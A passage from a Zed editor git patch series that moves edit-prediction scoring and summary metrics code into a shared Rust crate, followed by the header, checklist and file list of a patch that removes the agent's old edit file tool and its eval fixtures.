cursor_total_evaluated: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub wrong_editable_region_rate: Option, - pub isolated_whitespace_rate: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub avg_kept_rate: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub avg_recall_rate: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub total_kept_chars: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub total_correctly_deleted_chars: Option, - #[serde(skip_serializing_if = "Option::is_none")] - pub total_discarded_chars: Option, -} +pub type SummaryJson = edit_prediction_metrics::SummaryJson; pub fn compute_summary(examples: &[Example]) -> SummaryJson { - use crate::metrics::ClassificationMetrics; - - let mut all_delta_chr_f_scores = Vec::new(); - let mut all_reversal_ratios = Vec::new(); - let mut braces_disbalance_sum: usize = 0; - let mut total_delta_chr_f = ClassificationMetrics::default(); - let mut total_delta_chr_f_precision = 0.0; - let mut total_delta_chr_f_recall = 0.0; - let mut delta_chr_f_beta = 0.0; - let mut total_exact_lines = ClassificationMetrics::default(); - let mut total_scores: usize = 0; - let mut qa_reverts_count: usize = 0; - let mut qa_reverts_total: usize = 0; - let mut qa_confidence_sum: u64 = 0; - let mut qa_confidence_count: usize = 0; - let mut cursor_exact_matches: usize = 0; - let mut cursor_total: usize = 0; - let mut cursor_distance_sum: usize = 0; - let mut cursor_distance_count: usize = 0; - let mut wrong_editable_region_count: usize = 0; - let mut wrong_editable_region_total: usize = 0; - let mut isolated_whitespace_count: usize = 0; - let mut kept_rate_sum: f64 = 0.0; - let mut kept_rate_count: usize = 0; - let mut kept_chars_total: usize = 0; - let mut kept_chars_count: usize = 0; - let mut correctly_deleted_chars_total: usize = 0; - let mut correctly_deleted_chars_count: usize = 0; - let mut discarded_chars_total: usize = 0; - let mut discarded_chars_count: usize = 0; - let mut recall_rate_sum: f64 = 0.0; - let mut recall_rate_count: usize = 0; - - for example in examples { - for (score_idx, score) in example.score.iter().enumerate() { - all_delta_chr_f_scores.push(score.delta_chr_f); - all_reversal_ratios.push(score.reversal_ratio); - total_scores += 1; - braces_disbalance_sum += score.braces_disbalance; - total_delta_chr_f.accumulate(&score.delta_chr_f_counts()); - total_delta_chr_f_precision += score.delta_chr_f_precision; - total_delta_chr_f_recall += score.delta_chr_f_recall; - delta_chr_f_beta = score.delta_chr_f_beta; - total_exact_lines.accumulate(&score.exact_lines_counts()); - - // Accumulate QA metrics - if let Some(Some(qa)) = example.qa.get(score_idx) { - if let Some(reverts) = qa.reverts_edits { - qa_reverts_total += 1; - if reverts { - qa_reverts_count += 1; - } - } - if let Some(conf) = qa.confidence { - qa_confidence_sum += conf as u64; - qa_confidence_count += 1; - } - } - - // Accumulate wrong editable region metrics - if let Some(wrong) = score.wrong_editable_region { - wrong_editable_region_total += 1; - if wrong { - wrong_editable_region_count += 1; - } - } - - // Accumulate isolated whitespace metrics - if score.has_isolated_whitespace_changes { - isolated_whitespace_count += 1; - } - - // Accumulate kept and recall rate metrics - if let Some(kr) = score.kept_rate { - kept_rate_sum += kr; - kept_rate_count += 1; - } - if let Some(kept_chars) = score.kept_chars { - kept_chars_total += kept_chars; - kept_chars_count += 1; - } - if let Some(correctly_deleted_chars) = score.correctly_deleted_chars { - correctly_deleted_chars_total += correctly_deleted_chars; - correctly_deleted_chars_count += 1; - } - if let Some(discarded_chars) = score.discarded_chars { - discarded_chars_total += discarded_chars; - discarded_chars_count += 1; - } - if let Some(rr) = score.recall_rate { - recall_rate_sum += rr; - recall_rate_count += 1; - } - - // Accumulate cursor metrics - if let Some(exact_match) = score.cursor_exact_match { - cursor_total += 1; - if exact_match { - cursor_exact_matches += 1; - } - } - if let Some(dist) = score.cursor_distance { - cursor_distance_sum += dist; - cursor_distance_count += 1; - } - } - } - - let avg_delta_chr_f = if all_delta_chr_f_scores.is_empty() { - 0.0 - } else { - all_delta_chr_f_scores.iter().sum::() / all_delta_chr_f_scores.len() as f32 - }; - - let avg_reversal_ratio = if all_reversal_ratios.is_empty() { - 0.0 - } else { - all_reversal_ratios.iter().sum::() / all_reversal_ratios.len() as f32 - }; - - let avg_braces_disbalance = if total_scores == 0 { - 0.0 - } else { - braces_disbalance_sum as f32 / total_scores as f32 - }; - - let qa_avg_reverts_edits = if qa_reverts_total > 0 { - Some(qa_reverts_count as f32 / qa_reverts_total as f32) - } else { - None - }; - - let qa_avg_confidence = if qa_confidence_count > 0 { - Some(qa_confidence_sum as f32 / qa_confidence_count as f32) - } else { - None - }; - - let cursor_exact_match_rate = if cursor_total > 0 { - Some(cursor_exact_matches as f32 / cursor_total as f32) - } else { - None - }; - - let cursor_avg_distance = if cursor_distance_count > 0 { - Some(cursor_distance_sum as f32 / cursor_distance_count as f32) - } else { - None - }; - - let cursor_total_evaluated = if cursor_total > 0 { - Some(cursor_total) - } else { - None - }; - - let wrong_editable_region_rate = if wrong_editable_region_total > 0 { - Some(wrong_editable_region_count as f32 / wrong_editable_region_total as f32) - } else { - None - }; - - let isolated_whitespace_rate = if total_scores > 0 { - Some(isolated_whitespace_count as f32 / total_scores as f32) - } else { - None - }; - - let avg_kept_rate = if kept_rate_count > 0 { - Some(kept_rate_sum / kept_rate_count as f64) - } else { - None - }; - - let avg_recall_rate = if recall_rate_count > 0 { - Some(recall_rate_sum / recall_rate_count as f64) - } else { - None - }; - - let total_kept_chars = if kept_chars_count > 0 { - Some(kept_chars_total) - } else { - None - }; - - let total_correctly_deleted_chars = if correctly_deleted_chars_count > 0 { - Some(correctly_deleted_chars_total) - } else { - None - }; - - let total_discarded_chars = if discarded_chars_count > 0 { - Some(discarded_chars_total) - } else { - None - }; - - SummaryJson { - total_examples: total_scores, - avg_delta_chr_f, - delta_chr_f_beta, - delta_chr_f_true_positives: total_delta_chr_f.true_positives, - delta_chr_f_false_positives: total_delta_chr_f.false_positives, - delta_chr_f_false_negatives: total_delta_chr_f.false_negatives, - delta_chr_f_precision: if total_scores == 0 { - 0.0 - } else { - total_delta_chr_f_precision / total_scores as f64 - }, - delta_chr_f_recall: if total_scores == 0 { - 0.0 - } else { - total_delta_chr_f_recall / total_scores as f64 - }, - avg_braces_disbalance, - exact_lines_true_positives: total_exact_lines.true_positives, - exact_lines_false_positives: total_exact_lines.false_positives, - exact_lines_false_negatives: total_exact_lines.false_negatives, - exact_lines_precision: total_exact_lines.precision(), - exact_lines_recall: total_exact_lines.recall(), - exact_lines_f1: total_exact_lines.f1(), - avg_reversal_ratio, - qa_avg_reverts_edits, - qa_avg_confidence, - cursor_exact_match_rate, - cursor_avg_distance, - cursor_total_evaluated, - wrong_editable_region_rate, - isolated_whitespace_rate, - avg_kept_rate, - avg_recall_rate, - total_kept_chars, - total_correctly_deleted_chars, - total_discarded_chars, - } + edit_prediction_metrics::compute_summary(examples.iter().flat_map(|example| { + example + .score + .iter() + .enumerate() + .map(move |(score_idx, score)| { + let qa = example + .qa + .get(score_idx) + .and_then(|qa| qa.as_ref()) + .map(|qa| edit_prediction_metrics::QaSummaryData { + reverts_edits: qa.reverts_edits, + confidence: qa.confidence, + }); + + edit_prediction_metrics::PredictionSummaryInput { score, qa } + }) + })) } pub fn write_summary_json(examples: &[Example], path: &Path) -> anyhow::Result<()> { diff --git a/crates/edit_prediction_metrics/src/edit_prediction_metrics.rs b/crates/edit_prediction_metrics/src/edit_prediction_metrics.rs index 3afe02fd083076..74ad639b7e9773 100644 --- a/crates/edit_prediction_metrics/src/edit_prediction_metrics.rs +++ b/crates/edit_prediction_metrics/src/edit_prediction_metrics.rs @@ -1,6 +1,8 @@ mod kept_rate; mod patch_metrics; +mod prediction_score; mod reversal; +mod summary; mod tokenize; mod tree_sitter; @@ -22,5 +24,10 @@ pub use patch_metrics::extract_changed_lines_from_diff; pub use patch_metrics::has_isolated_whitespace_changes; pub use patch_metrics::is_editable_region_correct; pub use patch_metrics::reconstruct_texts_from_diff; +pub use prediction_score::{ + ActualPredictionCursor, PredictionReversalContext, PredictionScore, PredictionScoringInput, + PrepareExpectedPatchError, PreparedExpectedPatch, prepare_expected_patches, score_prediction, +}; pub use reversal::compute_prediction_reversal_ratio_from_history; +pub use summary::{PredictionSummaryInput, QaSummaryData, SummaryJson, compute_summary}; pub use tree_sitter::count_tree_sitter_errors; diff --git a/crates/edit_prediction_metrics/src/prediction_score.rs b/crates/edit_prediction_metrics/src/prediction_score.rs new file mode 100644 index 00000000000000..55c1d828762dd0 --- /dev/null +++ b/crates/edit_prediction_metrics/src/prediction_score.rs @@ -0,0 +1,319 @@ +use serde::{Deserialize, Serialize}; +use std::error::Error; +use std::fmt; +use std::path::Path; +use std::sync::Arc; +use zeta_prompt::udiff::{apply_diff_to_string, apply_diff_to_string_with_hunk_offset}; + +use crate::patch_metrics::{ + ClassificationMetrics, DeltaChrFMetrics, braces_disbalance, count_patch_token_changes, + delta_chr_f, delta_chr_f_beta, exact_lines_match, has_isolated_whitespace_changes, + is_editable_region_correct, +}; +use crate::reversal::compute_prediction_reversal_ratio_from_history; + +#[derive(Clone, Debug, Serialize, Deserialize)] +pub struct PredictionScore { + pub delta_chr_f: f32, + #[serde(default)] + pub delta_chr_f_true_positives: usize, + #[serde(default)] + pub delta_chr_f_false_positives: usize, + #[serde(default)] + pub delta_chr_f_false_negatives: usize, + #[serde(default)] + pub delta_chr_f_precision: f64, + #[serde(default)] + pub delta_chr_f_recall: f64, + #[serde(default)] + pub delta_chr_f_beta: f64, + pub braces_disbalance: usize, + #[serde(default)] + pub exact_lines_tp: usize, + #[serde(default)] + pub exact_lines_fp: usize, + #[serde(default)] + pub exact_lines_fn: usize, + #[serde(default)] + pub reversal_ratio: f32, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub cursor_distance: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub cursor_exact_match: Option, + pub wrong_editable_region: Option, + #[serde(default)] + pub has_isolated_whitespace_changes: bool, + #[serde(default)] + pub inserted_tokens: usize, + #[serde(default)] + pub deleted_tokens: usize, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub kept_rate: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub recall_rate: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub kept_chars: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub correctly_deleted_chars: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub discarded_chars: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub cumulative_logprob: Option, + #[serde(default, skip_serializing_if = "Option::is_none")] + pub avg_logprob: Option, +} + +impl PredictionScore { + pub fn zero() -> Self { + Self { + delta_chr_f: 0.0, + delta_chr_f_true_positives: 0, + delta_chr_f_false_positives: 0, + delta_chr_f_false_negatives: 0, + delta_chr_f_precision: 0.0, + delta_chr_f_recall: 0.0, + delta_chr_f_beta: delta_chr_f_beta(), + braces_disbalance: 0, + exact_lines_tp: 0, + exact_lines_fp: 0, + exact_lines_fn: 0, + reversal_ratio: 0.0, + cursor_distance: None, + cursor_exact_match: None, + wrong_editable_region: None, + has_isolated_whitespace_changes: false, + inserted_tokens: 0, + deleted_tokens: 0, + kept_rate: None, + recall_rate: None, + kept_chars: None, + correctly_deleted_chars: None, + discarded_chars: None, + cumulative_logprob: None, + avg_logprob: None, + } + } + + pub fn delta_chr_f_counts(&self) -> ClassificationMetrics { + ClassificationMetrics { + true_positives: self.delta_chr_f_true_positives, + false_positives: self.delta_chr_f_false_positives, + false_negatives: self.delta_chr_f_false_negatives, + } + } + + pub fn exact_lines_counts(&self) -> ClassificationMetrics { + ClassificationMetrics { + true_positives: self.exact_lines_tp, + false_positives: self.exact_lines_fp, + false_negatives: self.exact_lines_fn, + } + } +} + +impl Default for PredictionScore { + fn default() -> Self { + Self::zero() + } +} + +#[derive(Clone, Debug)] +pub struct PreparedExpectedPatch { + pub patch: String, + pub text: String, + pub cursor_editable_region_offset: Option, +} + +#[derive(Clone, Debug)] +pub struct PrepareExpectedPatchError { + message: String, +} + +impl fmt::Display for PrepareExpectedPatchError { + fn fmt(&self, formatter: &mut fmt::Formatter<'_>) -> fmt::Result { + self.message.fmt(formatter) + } +} + +impl Error for PrepareExpectedPatchError {} + +pub fn prepare_expected_patches( + expected_patches_with_cursors: &[(String, Option)], + original_text: &str, + old_editable_region: Option<&str>, +) -> Result, PrepareExpectedPatchError> { + expected_patches_with_cursors + .iter() + .map(|(patch, cursor_in_patch)| { + let text = apply_diff_to_string(patch, original_text).map_err(|error| { + PrepareExpectedPatchError { + message: error.to_string(), + } + })?; + let cursor_editable_region_offset = + if let (Some(editable_region), Some(cursor_in_patch)) = + (old_editable_region, *cursor_in_patch) + { + match apply_diff_to_string_with_hunk_offset(patch, editable_region) { + Ok((_, hunk_offset)) => Some(hunk_offset.unwrap_or(0) + cursor_in_patch), + Err(_) => None, + } + } else { + *cursor_in_patch + }; + + Ok(PreparedExpectedPatch { + patch: patch.clone(), + text, + cursor_editable_region_offset, + }) + }) + .collect() +} + +#[derive(Clone, Copy, Debug)] +pub struct ActualPredictionCursor { + pub row: u32, + pub editable_region_offset: Option, +} + +#[derive(Clone, Copy, Debug)] +pub struct PredictionReversalContext<'a> { + pub edit_history: &'a [Arc], + pub excerpt_start_row: Option, + pub cursor_path: &'a Path, +} + +#[derive(Clone, Copy, Debug)] +pub struct PredictionScoringInput<'a> { + pub original_text: &'a str, + pub expected_patches: &'a [PreparedExpectedPatch], + pub actual_patch: Option<&'a str>, + pub actual_cursor: Option, + pub reversal_context: Option>, + pub cumulative_logprob: Option, + pub avg_logprob: Option, +} + +pub fn score_prediction(input: PredictionScoringInput<'_>) -> PredictionScore { + let Some(actual_patch) = input.actual_patch else { + return PredictionScore::zero(); + }; + + let token_changes = count_patch_token_changes(actual_patch); + + let actual_text = match apply_diff_to_string(actual_patch, input.original_text) { + Ok(text) => text, + Err(_) => { + let mut score = PredictionScore::zero(); + score.inserted_tokens = token_changes.inserted_tokens; + score.deleted_tokens = token_changes.deleted_tokens; + return score; + } + }; + + let mut best_delta_chr_f_metrics = DeltaChrFMetrics::default(); + let mut best_expected_cursor = None; + let mut best_expected_text = None; + + for expected in input.expected_patches { + let delta_chr_f_metrics = delta_chr_f(input.original_text, &expected.text, &actual_text); + if delta_chr_f_metrics.score > best_delta_chr_f_metrics.score { + best_delta_chr_f_metrics = delta_chr_f_metrics; + best_expected_cursor = expected.cursor_editable_region_offset; + best_expected_text = Some(expected.text.as_str()); + } + } + + let disbalance_before = braces_disbalance(input.original_text); + let disbalance_after = braces_disbalance(&actual_text); + let braces_disbalance = disbalance_after.saturating_sub(disbalance_before); + + let best_exact_lines = input + .expected_patches + .iter() + .map(|expected| exact_lines_match(&expected.patch, actual_patch)) + .max_by_key(|metrics| metrics.true_positives) + .unwrap_or_default(); + + let reversal_ratio = input + .reversal_context + .map(|context| { + compute_prediction_reversal_ratio_from_history( + input.original_text, + context.edit_history, + context.excerpt_start_row, + &actual_text, + context.cursor_path, + ) + }) + .unwrap_or(0.0); + + let (cursor_distance, cursor_exact_match) = + compute_cursor_metrics(best_expected_cursor, input.actual_cursor); + + let wrong_editable_region = Some(!is_editable_region_correct(actual_patch)); + let has_isolated_whitespace_changes = + has_isolated_whitespace_changes(actual_patch, input.actual_cursor.map(|cursor| cursor.row)); + + let (kept_rate, recall_rate, kept_chars, correctly_deleted_chars, discarded_chars) = + best_expected_text + .map(|reference_text| { + let result = crate::kept_rate::compute_kept_rate( + input.original_text, + &actual_text, + reference_text, + ); + ( + Some(result.kept_rate), + Some(result.recall_rate), + Some(result.kept_chars), + Some(result.correctly_deleted_chars), + Some(result.discarded_chars), + ) + }) + .unwrap_or((None, None, None, None, None)); + + PredictionScore { + delta_chr_f: best_delta_chr_f_metrics.score as f32, + delta_chr_f_true_positives: best_delta_chr_f_metrics.counts.true_positives, + delta_chr_f_false_positives: best_delta_chr_f_metrics.counts.false_positives, + delta_chr_f_false_negatives: best_delta_chr_f_metrics.counts.false_negatives, + delta_chr_f_precision: best_delta_chr_f_metrics.precision, + delta_chr_f_recall: best_delta_chr_f_metrics.recall, + delta_chr_f_beta: best_delta_chr_f_metrics.beta, + braces_disbalance, + exact_lines_tp: best_exact_lines.true_positives, + exact_lines_fp: best_exact_lines.false_positives, + exact_lines_fn: best_exact_lines.false_negatives, + reversal_ratio, + cursor_distance, + cursor_exact_match, + wrong_editable_region, + has_isolated_whitespace_changes, + inserted_tokens: token_changes.inserted_tokens, + deleted_tokens: token_changes.deleted_tokens, + kept_rate, + recall_rate, + kept_chars, + correctly_deleted_chars, + discarded_chars, + cumulative_logprob: input.cumulative_logprob, + avg_logprob: input.avg_logprob, + } +} + +fn compute_cursor_metrics( + expected_cursor_editable_region_offset: Option, + actual_cursor: Option, +) -> (Option, Option) { + match (expected_cursor_editable_region_offset, actual_cursor) { + (Some(expected), Some(actual)) => { + let distance = expected.abs_diff(actual.editable_region_offset.unwrap_or_default()); + let exact_match = distance == 0; + (Some(distance), Some(exact_match)) + } + (None, None) => (None, None), + (Some(_), None) | (None, Some(_)) => (None, Some(false)), + } +} diff --git a/crates/edit_prediction_metrics/src/summary.rs b/crates/edit_prediction_metrics/src/summary.rs new file mode 100644 index 00000000000000..249ae185755db5 --- /dev/null +++ b/crates/edit_prediction_metrics/src/summary.rs @@ -0,0 +1,293 @@ +use serde::Serialize; + +use crate::patch_metrics::ClassificationMetrics; +use crate::prediction_score::PredictionScore; + +#[derive(Clone, Copy, Debug, Default)] +pub struct QaSummaryData { + pub reverts_edits: Option, + pub confidence: Option, +} + +#[derive(Clone, Copy, Debug)] +pub struct PredictionSummaryInput<'a> { + pub score: &'a PredictionScore, + pub qa: Option, +} + +#[derive(Clone, Debug, Serialize)] +pub struct SummaryJson { + pub total_examples: usize, + pub avg_delta_chr_f: f32, + pub delta_chr_f_beta: f64, + pub delta_chr_f_true_positives: usize, + pub delta_chr_f_false_positives: usize, + pub delta_chr_f_false_negatives: usize, + pub delta_chr_f_precision: f64, + pub delta_chr_f_recall: f64, + pub avg_braces_disbalance: f32, + pub exact_lines_true_positives: usize, + pub exact_lines_false_positives: usize, + pub exact_lines_false_negatives: usize, + pub exact_lines_precision: f64, + pub exact_lines_recall: f64, + pub exact_lines_f1: f64, + pub avg_reversal_ratio: f32, + #[serde(skip_serializing_if = "Option::is_none")] + pub qa_avg_reverts_edits: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub qa_avg_confidence: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub cursor_exact_match_rate: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub cursor_avg_distance: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub cursor_total_evaluated: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub wrong_editable_region_rate: Option, + pub isolated_whitespace_rate: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub avg_kept_rate: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub avg_recall_rate: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub total_kept_chars: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub total_correctly_deleted_chars: Option, + #[serde(skip_serializing_if = "Option::is_none")] + pub total_discarded_chars: Option, +} + +pub fn compute_summary<'a>( + predictions: impl IntoIterator>, +) -> SummaryJson { + let mut all_delta_chr_f_scores = Vec::new(); + let mut all_reversal_ratios = Vec::new(); + let mut braces_disbalance_sum: usize = 0; + let mut total_delta_chr_f = ClassificationMetrics::default(); + let mut total_delta_chr_f_precision = 0.0; + let mut total_delta_chr_f_recall = 0.0; + let mut delta_chr_f_beta = 0.0; + let mut total_exact_lines = ClassificationMetrics::default(); + let mut total_scores: usize = 0; + let mut qa_reverts_count: usize = 0; + let mut qa_reverts_total: usize = 0; + let mut qa_confidence_sum: u64 = 0; + let mut qa_confidence_count: usize = 0; + let mut cursor_exact_matches: usize = 0; + let mut cursor_total: usize = 0; + let mut cursor_distance_sum: usize = 0; + let mut cursor_distance_count: usize = 0; + let mut wrong_editable_region_count: usize = 0; + let mut wrong_editable_region_total: usize = 0; + let mut isolated_whitespace_count: usize = 0; + let mut kept_rate_sum: f64 = 0.0; + let mut kept_rate_count: usize = 0; + let mut kept_chars_total: usize = 0; + let mut kept_chars_count: usize = 0; + let mut correctly_deleted_chars_total: usize = 0; + let mut correctly_deleted_chars_count: usize = 0; + let mut discarded_chars_total: usize = 0; + let mut discarded_chars_count: usize = 0; + let mut recall_rate_sum: f64 = 0.0; + let mut recall_rate_count: usize = 0; + + for prediction in predictions { + let score = prediction.score; + + all_delta_chr_f_scores.push(score.delta_chr_f); + all_reversal_ratios.push(score.reversal_ratio); + total_scores += 1; + braces_disbalance_sum += score.braces_disbalance; + total_delta_chr_f.accumulate(&score.delta_chr_f_counts()); + total_delta_chr_f_precision += score.delta_chr_f_precision; + total_delta_chr_f_recall += score.delta_chr_f_recall; + delta_chr_f_beta = score.delta_chr_f_beta; + total_exact_lines.accumulate(&score.exact_lines_counts()); + + if let Some(qa) = prediction.qa { + if let Some(reverts) = qa.reverts_edits { + qa_reverts_total += 1; + if reverts { + qa_reverts_count += 1; + } + } + if let Some(confidence) = qa.confidence { + qa_confidence_sum += confidence as u64; + qa_confidence_count += 1; + } + } + + if let Some(wrong) = score.wrong_editable_region { + wrong_editable_region_total += 1; + if wrong { + wrong_editable_region_count += 1; + } + } + + if score.has_isolated_whitespace_changes { + isolated_whitespace_count += 1; + } + + if let Some(kept_rate) = score.kept_rate { + kept_rate_sum += kept_rate; + kept_rate_count += 1; + } + if let Some(kept_chars) = score.kept_chars { + kept_chars_total += kept_chars; + kept_chars_count += 1; + } + if let Some(correctly_deleted_chars) = score.correctly_deleted_chars { + correctly_deleted_chars_total += correctly_deleted_chars; + correctly_deleted_chars_count += 1; + } + if let Some(discarded_chars) = score.discarded_chars { + discarded_chars_total += discarded_chars; + discarded_chars_count += 1; + } + if let Some(recall_rate) = score.recall_rate { + recall_rate_sum += recall_rate; + recall_rate_count += 1; + } + + if let Some(exact_match) = score.cursor_exact_match { + cursor_total += 1; + if exact_match { + cursor_exact_matches += 1; + } + } + if let Some(distance) = score.cursor_distance { + cursor_distance_sum += distance; + cursor_distance_count += 1; + } + } + + let avg_delta_chr_f = if all_delta_chr_f_scores.is_empty() { + 0.0 + } else { + all_delta_chr_f_scores.iter().sum::() / all_delta_chr_f_scores.len() as f32 + }; + + let avg_reversal_ratio = if all_reversal_ratios.is_empty() { + 0.0 + } else { + all_reversal_ratios.iter().sum::() / all_reversal_ratios.len() as f32 + }; + + let avg_braces_disbalance = if total_scores == 0 { + 0.0 + } else { + braces_disbalance_sum as f32 / total_scores as f32 + }; + + let qa_avg_reverts_edits = if qa_reverts_total > 0 { + Some(qa_reverts_count as f32 / qa_reverts_total as f32) + } else { + None + }; + + let qa_avg_confidence = if qa_confidence_count > 0 { + Some(qa_confidence_sum as f32 / qa_confidence_count as f32) + } else { + None + }; + + let cursor_exact_match_rate = if cursor_total > 0 { + Some(cursor_exact_matches as f32 / cursor_total as f32) + } else { + None + }; + + let cursor_avg_distance = if cursor_distance_count > 0 { + Some(cursor_distance_sum as f32 / cursor_distance_count as f32) + } else { + None + }; + + let cursor_total_evaluated = if cursor_total > 0 { + Some(cursor_total) + } else { + None + }; + + let wrong_editable_region_rate = if wrong_editable_region_total > 0 { + Some(wrong_editable_region_count as f32 / wrong_editable_region_total as f32) + } else { + None + }; + + let isolated_whitespace_rate = if total_scores > 0 { + Some(isolated_whitespace_count as f32 / total_scores as f32) + } else { + None + }; + + let avg_kept_rate = if kept_rate_count > 0 { + Some(kept_rate_sum / kept_rate_count as f64) + } else { + None + }; + + let avg_recall_rate = if recall_rate_count > 0 { + Some(recall_rate_sum / recall_rate_count as f64) + } else { + None + }; + + let total_kept_chars = if kept_chars_count > 0 { + Some(kept_chars_total) + } else { + None + }; + + let total_correctly_deleted_chars = if correctly_deleted_chars_count > 0 { + Some(correctly_deleted_chars_total) + } else { + None + }; + + let total_discarded_chars = if discarded_chars_count > 0 { + Some(discarded_chars_total) + } else { + None + }; + + SummaryJson { + total_examples: total_scores, + avg_delta_chr_f, + delta_chr_f_beta, + delta_chr_f_true_positives: total_delta_chr_f.true_positives, + delta_chr_f_false_positives: total_delta_chr_f.false_positives, + delta_chr_f_false_negatives: total_delta_chr_f.false_negatives, + delta_chr_f_precision: if total_scores == 0 { + 0.0 + } else { + total_delta_chr_f_precision / total_scores as f64 + }, + delta_chr_f_recall: if total_scores == 0 { + 0.0 + } else { + total_delta_chr_f_recall / total_scores as f64 + }, + avg_braces_disbalance, + exact_lines_true_positives: total_exact_lines.true_positives, + exact_lines_false_positives: total_exact_lines.false_positives, + exact_lines_false_negatives: total_exact_lines.false_negatives, + exact_lines_precision: total_exact_lines.precision(), + exact_lines_recall: total_exact_lines.recall(), + exact_lines_f1: total_exact_lines.f1(), + avg_reversal_ratio, + qa_avg_reverts_edits, + qa_avg_confidence, + cursor_exact_match_rate, + cursor_avg_distance, + cursor_total_evaluated, + wrong_editable_region_rate, + isolated_whitespace_rate, + avg_kept_rate, + avg_recall_rate, + total_kept_chars, + total_correctly_deleted_chars, + total_discarded_chars, + } +} From aa5130594dfba0d8d2687d8bcb8eba08455d40cb Mon Sep 17 00:00:00 2001 From: Bennet Bo Fenner Date: Mon, 4 May 2026 11:54:39 +0200 Subject: [PATCH 151/231] agent: Remove old edit file tool (#55612) Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - agent: Improve reliability when LLM edits file --- .zed/settings.json | 1 - Cargo.lock | 1 - crates/agent/Cargo.toml | 1 - crates/agent/src/agent.rs | 1 - crates/agent/src/edit_agent.rs | 1527 -- .../src/edit_agent/create_file_parser.rs | 237 - crates/agent/src/edit_agent/edit_parser.rs | 1094 - crates/agent/src/edit_agent/evals.rs | 1701 -- .../fixtures/add_overwrite_test/before.rs | 1572 -- .../fixtures/delete_run_git_blame/after.rs | 328 - .../fixtures/delete_run_git_blame/before.rs | 371 - .../disable_cursor_blinking/before.rs | 21344 ---------------- .../disable_cursor_blinking/possible-01.diff | 28 - .../disable_cursor_blinking/possible-02.diff | 29 - .../disable_cursor_blinking/possible-03.diff | 34 - .../disable_cursor_blinking/possible-04.diff | 33 - .../extract_handle_command_output/before.rs | 371 - .../possible-01.diff | 11 - .../possible-02.diff | 26 - .../possible-03.diff | 11 - .../possible-04.diff | 24 - .../possible-05.diff | 26 - .../possible-06.diff | 23 - .../possible-07.diff | 26 - .../possible-08.diff | 26 - .../from_pixels_constructor/before.rs | 339 - .../fixtures/translate_doc_comments/before.rs | 339 - .../before.rs | 1629 -- .../edit_agent/evals/fixtures/zode/prompt.md | 2193 -- .../edit_agent/evals/fixtures/zode/react.py | 14 - .../evals/fixtures/zode/react_test.py | 271 - .../agent/src/tests/edit_file_thread_test.rs | 407 - crates/agent/src/tests/mod.rs | 16 +- crates/agent/src/thread.rs | 32 +- crates/agent/src/tool_permissions.rs | 4 +- crates/agent/src/tools.rs | 2 - crates/agent/src/tools/edit_file_tool.rs | 4501 +++- .../edit_file_tool}/reindent.rs | 0 .../streaming_fuzzy_matcher.rs | 0 .../src/tools/evals/streaming_edit_file.rs | 26 +- .../src/tools/streaming_edit_file_tool.rs | 4410 ---- 41 files changed, 3166 insertions(+), 39863 deletions(-) delete mode 100644 crates/agent/src/edit_agent.rs delete mode 100644 crates/agent/src/edit_agent/create_file_parser.rs delete mode 100644 crates/agent/src/edit_agent/edit_parser.rs delete mode 100644 crates/agent/src/edit_agent/evals.rs delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/add_overwrite_test/before.rs delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/delete_run_git_blame/after.rs delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/delete_run_git_blame/before.rs delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/before.rs delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-01.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-02.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-03.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/disable_cursor_blinking/possible-04.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/before.rs delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-01.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-02.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-03.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-04.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-05.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-06.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-07.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/extract_handle_command_output/possible-08.diff delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/from_pixels_constructor/before.rs delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/translate_doc_comments/before.rs delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/use_wasi_sdk_in_compile_parser_to_wasm/before.rs delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/zode/prompt.md delete mode 100644 crates/agent/src/edit_agent/evals/fixtures/zode/react.py 